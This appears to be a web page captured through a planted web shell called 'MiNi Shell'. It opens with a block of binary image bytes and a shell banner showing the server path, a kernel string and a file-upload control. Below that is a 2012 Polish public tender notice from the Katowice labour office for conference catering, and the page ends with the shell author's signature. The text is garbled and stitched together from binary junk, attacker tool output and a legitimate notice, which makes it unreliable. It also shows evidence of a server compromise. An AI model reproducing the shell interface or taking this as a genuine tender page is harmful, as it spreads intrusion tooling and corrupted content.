JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121114/450690-N-2012.html

<p class="kh_header"><b>Katowice: ŚWIADCZENIE USŁUGI CATERINGOWEJ W DNIACH 18 ORAZ 19 GRUDNIA 2012 R.</b><br>
<b>Numer ogłoszenia: 450690 - 2012; data zamieszczenia: 14.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ W DNIACH 18 ORAZ 19 GRUDNIA 2012 R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I 

Przedmiotem zamówienia w części I jest świadczenie usługi cateringowej dla 200 osób podczas konferencji tematycznej poświęconej outplacementowi w działaniach publicznych służb zatrudnienia oraz innych podmiotów w zakresie łagodzenia skutków zwolnień, która odbędzie się w dniu 18 grudnia 2012 r. w auli Wydziału Teologicznego Uniwersytetu Śląskiego w Katowicach przy ul. Jordana 18.

Usługa cateringowa powinna obejmować: 
1) Napoje: 

a) wysokogatunkowa gorąca kawa i herbata podana w termosach - bez ograniczeń, 
b) dodatki: cukier, mleko, cytryna - bez ograniczeń, 
c) woda mineralna - 1 butelka na osobę: 
 woda mineralna gazowana (100 butelek plastikowych o pojemności 500 ml), 
 woda mineralna niegazowana (100 butelek plastikowych o pojemności  500 ml), 
d) soki (3 rodzaje - pomarańczowy, porzeczkowy, grejpfrutowy, podane w szklanych dzbankach) - 200 ml na osobę, 

2) Wyroby cukiernicze różnorodne: 

a) mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30 g na osobę 
z każdego rodzaju, 
b) ciasta domowego wypieku - 2 sztuki na osobę: 
- co najmniej 3 rodzaje ciast: szarlotka, sernik, makowiec (200 sztuk), 
- Babeczki owocowe (100 sztuk), 
- Rogaliki drożdżowe z nadzieniem (100 sztuk). 

3) Kanapki bankietowe na jasnym i ciemnym pieczywie - 2 sztuki na osobę: 

- z szynką, pomidorem, serem mozzarella i bazylią (60 szt. x 40 g), 
- z łososiem, cytrynką i koperkiem (60 szt. x 40 g), 
- z pastą jajeczną, pomidorem, papryką i pietruszką (60 szt. x 40 g), 
- z salami, czerwoną papryką i czarnymi oliwkami (60 szt. x 40 g), 
- z żółtym serem i oliwkami (60 szt. x 40 g); 

4) Świeże owoce podawane na paterach: 

- jabłka - 2 kg, 
- banany - 1,5 kg, 
- winogrona (zielone, czarne) - 3 kg, 
- pomarańcze - 1,5 kg, 
- mandarynki - 2 kg, 

5) Przekąski koktajlowe: 

- mini- quiche z brokułami i tuńczykiem (60 szt.) 
- babeczki z łososia wędzonego (60 szt.) 
- ruloniki ze schabu z musem chrzanowym (60 szt.), 
- jajka faszerowane z pieczarką (60 szt.) 
- koreczki mini caprese (mozarella i pomidorki - 30 szt.) 
- koreczki z serem żółtym i kabanosem (30 szt.) 

Catering powinien zostać dostarczony do miejsca odbywania konferencji - Wydział Teologiczny Uniwersytetu Śląskiego w Katowicach przy ulicy Jordana 18.
Konferencja planowana jest w godzinach 10.00 - 13.00 w auli głównej, dlatego zamówiony asortyment (poz. 1 - 5) powinien zostać dostarczony na godzinę 12.00. 
Nie przewiduje się obsługi kelnerskiej, zamówiony asortyment spożywczy powinien zostać rozłożony na przygotowanych uprzednio stołach. 

Wykonawca jest zobowiązany zapewnić również: 
- zastawę białą porcelanową lub ceramiczną, sztućce trwałe - w odpowiedniej ilości, 
- dekorację stołu - obrusy materiałowe i dopasowane serwetki papierowe (jednorazowe), 
- transport,


CZĘŚĆ II

Przedmiotem zamówienia w części II jest świadczenie usługi cateringowej dla 20 osób podczas spotkania panelu eksperckiego na potrzeby projektu Śląskie wyzwania w ramach Poddziałania 7.2.1 PO KL, które odbędzie się w dniu 19 grudnia 2012 r. w siedzibie WUP w Katowicach.


Na usługę składać się będą:

1. Napoje:
- gorąca wysokogatunkowa kawa i herbata podana w termosach - bez ograniczeń,
- dodatki: cukier, mleko, cytryna - bez ograniczeń,
- woda mineralna niegazowana (20 butelek plastikowych o pojemności 500 ml),
- soki - pomarańczowy i jabłkowy lub z czarnej porzeczki (po 2 litry z każdego rodzaju); podawane w szklanych dzbankach.

2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 100 sztuk):
- z szynką i pomidorem (25 szt. x 40 g),
- z pastą jajeczną, pomidorem, papryką i pietruszką (25 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym (25 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (25 szt. x 40 g).

3. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem, brzoskwinią (25 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (25 porcji x 65 g).

4. Przekąski słone:
- mix przekąsek: paluszki, krakersy, precelki - 75 g różnych przekąsek na osobę.

5. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp.)

6. Dekoracja stołów (obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe)

7. Transport

Spotkanie planowane jest w godzinach 12.00 - 15.00 w siedzibie WUP Katowice, II piętro, sala 221, dlatego zamówiony catering powinien zostać dostarczony na godzinę 11.00. 
Nie przewiduje się obsługi kelnerskiej, zamówiony asortyment spożywczy powinien zostać rozłożony na przygotowanych uprzednio stołach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE PRZEWIDUJE  WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2012 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa  współfinansowana przez Unię Europejską ze środków Europejskiego Funduszu Społecznego
 w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ W DNIACH 18 ORAZ 19 GRUDNIA 2012 R..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I 

Przedmiotem zamówienia w części I jest świadczenie usługi cateringowej dla 200 osób podczas konferencji tematycznej poświęconej outplacementowi w działaniach publicznych służb zatrudnienia oraz innych podmiotów w zakresie łagodzenia skutków zwolnień, która odbędzie się w dniu 18 grudnia 2012 r. w auli Wydziału Teologicznego Uniwersytetu Śląskiego w Katowicach przy ul. Jordana 18.

Usługa cateringowa powinna obejmować: 
1) Napoje: 

a) wysokogatunkowa gorąca kawa i herbata podana w termosach - bez ograniczeń, 
b) dodatki: cukier, mleko, cytryna - bez ograniczeń, 
c) woda mineralna - 1 butelka na osobę: 
 woda mineralna gazowana (100 butelek plastikowych o pojemności 500 ml), 
 woda mineralna niegazowana (100 butelek plastikowych o pojemności  500 ml), 
d) soki (3 rodzaje - pomarańczowy, porzeczkowy, grejpfrutowy, podane w szklanych dzbankach) - 200 ml na osobę, 

2) Wyroby cukiernicze różnorodne: 

a) mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30 g na osobę 
z każdego rodzaju, 
b) ciasta domowego wypieku - 2 sztuki na osobę: 
- co najmniej 3 rodzaje ciast: szarlotka, sernik, makowiec (200 sztuk), 
- Babeczki owocowe (100 sztuk), 
- Rogaliki drożdżowe z nadzieniem (100 sztuk). 

3) Kanapki bankietowe na jasnym i ciemnym pieczywie - 2 sztuki na osobę: 

- z szynką, pomidorem, serem mozzarella i bazylią (60 szt. x 40 g), 
- z łososiem, cytrynką i koperkiem (60 szt. x 40 g), 
- z pastą jajeczną, pomidorem, papryką i pietruszką (60 szt. x 40 g), 
- z salami, czerwoną papryką i czarnymi oliwkami (60 szt. x 40 g), 
- z żółtym serem i oliwkami (60 szt. x 40 g); 

4) Świeże owoce podawane na paterach: 

- jabłka - 2 kg, 
- banany - 1,5 kg, 
- winogrona (zielone, czarne) - 3 kg, 
- pomarańcze - 1,5 kg, 
- mandarynki - 2 kg, 

5) Przekąski koktajlowe: 

- mini- quiche z brokułami i tuńczykiem (60 szt.) 
- babeczki z łososia wędzonego (60 szt.) 
- ruloniki ze schabu z musem chrzanowym (60 szt.), 
- jajka faszerowane z pieczarką (60 szt.) 
- koreczki mini caprese (mozarella i pomidorki - 30 szt.) 
- koreczki z serem żółtym i kabanosem (30 szt.) 

Catering powinien zostać dostarczony do miejsca odbywania konferencji - Wydział Teologiczny Uniwersytetu Śląskiego w Katowicach przy ulicy Jordana 18.
Konferencja planowana jest w godzinach 10.00 - 13.00 w auli głównej, dlatego zamówiony asortyment (poz. 1 - 5) powinien zostać dostarczony na godzinę 12.00. 
Nie przewiduje się obsługi kelnerskiej, zamówiony asortyment spożywczy powinien zostać rozłożony na przygotowanych uprzednio stołach. 

Wykonawca jest zobowiązany zapewnić również: 
- zastawę białą porcelanową lub ceramiczną, sztućce trwałe - w odpowiedniej ilości, 
- dekorację stołu - obrusy materiałowe i dopasowane serwetki papierowe (jednorazowe), 
- transport,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ W DNIACH 18 ORAZ 19 GRUDNIA 2012 R..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II

Przedmiotem zamówienia w części II jest świadczenie usługi cateringowej dla 20 osób podczas spotkania panelu eksperckiego na potrzeby projektu Śląskie wyzwania w ramach Poddziałania 7.2.1 PO KL, które odbędzie się w dniu 19 grudnia 2012 r. w siedzibie WUP w Katowicach.


Na usługę składać się będą:

1. Napoje:
- gorąca wysokogatunkowa kawa i herbata podana w termosach - bez ograniczeń,
- dodatki: cukier, mleko, cytryna - bez ograniczeń,
- woda mineralna niegazowana (20 butelek plastikowych o pojemności 500 ml),
- soki - pomarańczowy i jabłkowy lub z czarnej porzeczki (po 2 litry z każdego rodzaju); podawane w szklanych dzbankach.

2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 100 sztuk):
- z szynką i pomidorem (25 szt. x 40 g),
- z pastą jajeczną, pomidorem, papryką i pietruszką (25 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym (25 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (25 szt. x 40 g).

3. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem, brzoskwinią (25 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (25 porcji x 65 g).

4. Przekąski słone:
- mix przekąsek: paluszki, krakersy, precelki - 75 g różnych przekąsek na osobę.

5. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp.)

6. Dekoracja stołów (obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe)

7. Transport

Spotkanie planowane jest w godzinach 12.00 - 15.00 w siedzibie WUP Katowice, II piętro, sala 221, dlatego zamówiony catering powinien zostać dostarczony na godzinę 11.00. 
Nie przewiduje się obsługi kelnerskiej, zamówiony asortyment spożywczy powinien zostać rozłożony na przygotowanych uprzednio stołach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com